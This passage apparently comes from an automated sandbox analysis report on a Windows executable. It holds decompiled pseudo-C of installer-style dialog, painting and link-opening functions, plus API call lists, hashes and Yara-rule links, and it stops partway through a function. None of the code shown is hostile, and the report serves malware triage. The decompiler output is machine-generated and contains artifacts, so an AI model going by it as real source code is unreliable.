                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                            • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                                            • Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                            • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                                            0x00403a4e
                                                                                                            0x00403a57
                                                                                                            0x00403b98
                                                                                                            0x00403b9c
                                                                                                            0x00403ba0
                                                                                                            0x00403ba2
                                                                                                            0x00403ba7
                                                                                                            0x00403bb2
                                                                                                            0x00403bbd
                                                                                                            0x00403bc2
                                                                                                            0x00403bc4
                                                                                                            0x00403bc6
                                                                                                            0x00403bc9
                                                                                                            0x00403bce
                                                                                                            0x00403bdc
                                                                                                            0x00403be9
                                                                                                            0x00403bf0
                                                                                                            0x00403bf0
                                                                                                            0x00403bf1
                                                                                                            0x00403bf1
                                                                                                            0x00403bf6
                                                                                                            0x00403bfc
                                                                                                            0x00403c03
                                                                                                            0x00403c09
                                                                                                            0x00403c0b
                                                                                                            0x00403c4b
                                                                                                            0x00403c50
                                                                                                            0x00403c55
                                                                                                            0x00403c55
                                                                                                            0x00403c5a
                                                                                                            0x00403c63
                                                                                                            0x00403c65
                                                                                                            0x00403c6a
                                                                                                            0x00403c70
                                                                                                            0x00403c74
                                                                                                            0x00403c74
                                                                                                            0x00403c79
                                                                                                            0x00403c7f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c8a
                                                                                                            0x00403c90
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c99
                                                                                                            0x00403ca1
                                                                                                            0x00403ca6
                                                                                                            0x00403ca9
                                                                                                            0x00403caf
                                                                                                            0x00403cb4
                                                                                                            0x00403cb7
                                                                                                            0x00403cbd
                                                                                                            0x00403cc2
                                                                                                            0x00403cc5
                                                                                                            0x00403ccb
                                                                                                            0x00403cd3
                                                                                                            0x00403cd9
                                                                                                            0x00403cdf
                                                                                                            0x00403ce3
                                                                                                            0x00403cea
                                                                                                            0x00403cea
                                                                                                            0x00403cea
                                                                                                            0x00403cf4
                                                                                                            0x00403d06
                                                                                                            0x00403d12
                                                                                                            0x00403d17
                                                                                                            0x00403d21
                                                                                                            0x00403d27
                                                                                                            0x00403d29
                                                                                                            0x00403d2e
                                                                                                            0x00403d2b
                                                                                                            0x00403d2b
                                                                                                            0x00403d2b
                                                                                                            0x00403d3e
                                                                                                            0x00403d56
                                                                                                            0x00403d58
                                                                                                            0x00403d5e
                                                                                                            0x00403d73
                                                                                                            0x00403d60
                                                                                                            0x00403d69
                                                                                                            0x00403d6b
                                                                                                            0x00403d6b
                                                                                                            0x00403d79
                                                                                                            0x00403d89
                                                                                                            0x00403d9a
                                                                                                            0x00403da1
                                                                                                            0x00403da7
                                                                                                            0x00403dab
                                                                                                            0x00403db0
                                                                                                            0x00403db2
                                                                                                            0x00000000
                                                                                                            0x00403db8
                                                                                                            0x00403db8
                                                                                                            0x00403dba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403dc0
                                                                                                            0x00403dc4
                                                                                                            0x00403de9
                                                                                                            0x00403def
                                                                                                            0x00403df5
                                                                                                            0x00403df7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403e1d
                                                                                                            0x00403e23
                                                                                                            0x00403e25
                                                                                                            0x00403e2a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403e30
                                                                                                            0x00403e33
                                                                                                            0x00403e36
                                                                                                            0x00403e4d
                                                                                                            0x00403e59
                                                                                                            0x00403e72
                                                                                                            0x00403e78
                                                                                                            0x00403e7c
                                                                                                            0x00403e81
                                                                                                            0x00403e87
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403e91
                                                                                                            0x00403e9c
                                                                                                            0x00000000
                                                                                                            0x00403e9c
                                                                                                            0x00403dc6
                                                                                                            0x00403dcc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403dd2
                                                                                                            0x00403dd8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403dde
                                                                                                            0x00403db2
                                                                                                            0x00403ea9
                                                                                                            0x00403eb5
                                                                                                            0x00403ebc
                                                                                                            0x00000000
                                                                                                            0x00403c0d
                                                                                                            0x00403c0d
                                                                                                            0x00403c10
                                                                                                            0x00403c43
                                                                                                            0x00403c43
                                                                                                            0x00403c45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c45
                                                                                                            0x00403c12
                                                                                                            0x00403c16
                                                                                                            0x00403c1b
                                                                                                            0x00403c1d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c2d
                                                                                                            0x00403c35
                                                                                                            0x00000000
                                                                                                            0x00403c3b
                                                                                                            0x00403a69
                                                                                                            0x00403a69
                                                                                                            0x00403a6d
                                                                                                            0x00403a72
                                                                                                            0x00403a81
                                                                                                            0x00403a81
                                                                                                            0x00403a8a
                                                                                                            0x00403a93
                                                                                                            0x00403a9e
                                                                                                            0x00403a9e
                                                                                                            0x00403aaa
                                                                                                            0x00403ac6
                                                                                                            0x00403ac9
                                                                                                            0x00403adc
                                                                                                            0x00403ae2
                                                                                                            0x00403b85
                                                                                                            0x00000000
                                                                                                            0x00403b8e
                                                                                                            0x00403ae8
                                                                                                            0x00403af5
                                                                                                            0x00403af7
                                                                                                            0x00403af9
                                                                                                            0x00403b18
                                                                                                            0x00403b18
                                                                                                            0x00403b1b
                                                                                                            0x00403b20
                                                                                                            0x00403b23
                                                                                                            0x00403b33
                                                                                                            0x00403b34
                                                                                                            0x00403b36
                                                                                                            0x00403b6c
                                                                                                            0x00403b7f
                                                                                                            0x00000000
                                                                                                            0x00403b7f
                                                                                                            0x00403b38
                                                                                                            0x00403b3e
                                                                                                            0x00403b57
                                                                                                            0x00403b5c
                                                                                                            0x00403b5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b60
                                                                                                            0x00403b4c
                                                                                                            0x00403b4c
                                                                                                            0x00403b4e
                                                                                                            0x00403b4e
                                                                                                            0x00000000
                                                                                                            0x00403b4e
                                                                                                            0x00403b41
                                                                                                            0x00403b46
                                                                                                            0x00000000
                                                                                                            0x00403b46
                                                                                                            0x00403b25
                                                                                                            0x00403b2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b2d
                                                                                                            0x00000000
                                                                                                            0x00403b2d
                                                                                                            0x00403b1d
                                                                                                            0x00000000
                                                                                                            0x00403b1d
                                                                                                            0x00403b03
                                                                                                            0x00403b0a
                                                                                                            0x00403b10
                                                                                                            0x00403b12
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b12
                                                                                                            0x00403ace
                                                                                                            0x00000000
                                                                                                            0x00403aac
                                                                                                            0x00403ab2
                                                                                                            0x00403abc
                                                                                                            0x00403ec2
                                                                                                            0x00403ec8
                                                                                                            0x00403ed5
                                                                                                            0x00403edb
                                                                                                            0x00403edb
                                                                                                            0x00403ee5
                                                                                                            0x00000000
                                                                                                            0x00403ee5
                                                                                                            0x00403aaa

                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                            • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                            • DestroyWindow.USER32 ref: 00403AB2
                                                                                                            • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                            • GetDlgItem.USER32 ref: 00403AEF
                                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                            • GetDlgItem.USER32 ref: 00403BB8
                                                                                                            • GetDlgItem.USER32 ref: 00403BC2
                                                                                                            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                            • GetDlgItem.USER32 ref: 00403CD3
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                            • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                            • lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                                            • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 184305955-0
                                                                                                            • Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                            • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                            • Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                            • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

















                                                                                                            0x00404070
                                                                                                            0x00404196
                                                                                                            0x004041f2
                                                                                                            0x004041f6
                                                                                                            0x004042cd
                                                                                                            0x004042cf
                                                                                                            0x004042cf
                                                                                                            0x004042d5
                                                                                                            0x004042d5
                                                                                                            0x004042d8
                                                                                                            0x00000000
                                                                                                            0x004042df
                                                                                                            0x00404204
                                                                                                            0x00404206
                                                                                                            0x00404210
                                                                                                            0x0040421b
                                                                                                            0x0040421e
                                                                                                            0x00404221
                                                                                                            0x0040422c
                                                                                                            0x0040422f
                                                                                                            0x00404236
                                                                                                            0x00404244
                                                                                                            0x0040425c
                                                                                                            0x00404264
                                                                                                            0x0040426f
                                                                                                            0x0040427f
                                                                                                            0x00404281
                                                                                                            0x00404281
                                                                                                            0x00404236
                                                                                                            0x0040428b
                                                                                                            0x00000000
                                                                                                            0x00404296
                                                                                                            0x0040429a
                                                                                                            0x004042ab
                                                                                                            0x004042ab
                                                                                                            0x004042b1
                                                                                                            0x004042bf
                                                                                                            0x004042bf
                                                                                                            0x00000000
                                                                                                            0x004042c3
                                                                                                            0x0040428b
                                                                                                            0x004041a1
                                                                                                            0x00000000
                                                                                                            0x004041b5
                                                                                                            0x004041bb
                                                                                                            0x004041c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004041e6
                                                                                                            0x004041e8
                                                                                                            0x004041ed
                                                                                                            0x00000000
                                                                                                            0x004041ed
                                                                                                            0x004041a1
                                                                                                            0x00404076
                                                                                                            0x00404079
                                                                                                            0x0040407e
                                                                                                            0x0040408f
                                                                                                            0x0040408f
                                                                                                            0x00404096
                                                                                                            0x00404099
                                                                                                            0x0040409b
                                                                                                            0x004040a0
                                                                                                            0x004040a9
                                                                                                            0x004040af
                                                                                                            0x004040bb
                                                                                                            0x004040be
                                                                                                            0x004040c7
                                                                                                            0x004040cc
                                                                                                            0x004040cf
                                                                                                            0x004040d4
                                                                                                            0x004040eb
                                                                                                            0x004040f2
                                                                                                            0x00404105
                                                                                                            0x00404108
                                                                                                            0x0040411d
                                                                                                            0x00404124
                                                                                                            0x00404129
                                                                                                            0x0040412e
                                                                                                            0x0040412e
                                                                                                            0x0040413d
                                                                                                            0x0040414c
                                                                                                            0x0040414e
                                                                                                            0x00404164
                                                                                                            0x00404173
                                                                                                            0x00404175
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040EB
                                                                                                            • GetDlgItem.USER32 ref: 004040FF
                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                            • GetSysColor.USER32(?), ref: 0040412E
                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                            • lstrlenA.KERNEL32(?), ref: 00404156
                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                            • GetDlgItem.USER32 ref: 004041D6
                                                                                                            • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                            • GetDlgItem.USER32 ref: 00404204
                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                            • LoadCursorA.USER32 ref: 00404253
                                                                                                            • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                            • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                            • LoadCursorA.USER32 ref: 0040427C
                                                                                                            • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                            • String ID: @.B$N$open
                                                                                                            • API String ID: 3615053054-3815657624
                                                                                                            • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                            • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                            • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                            • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
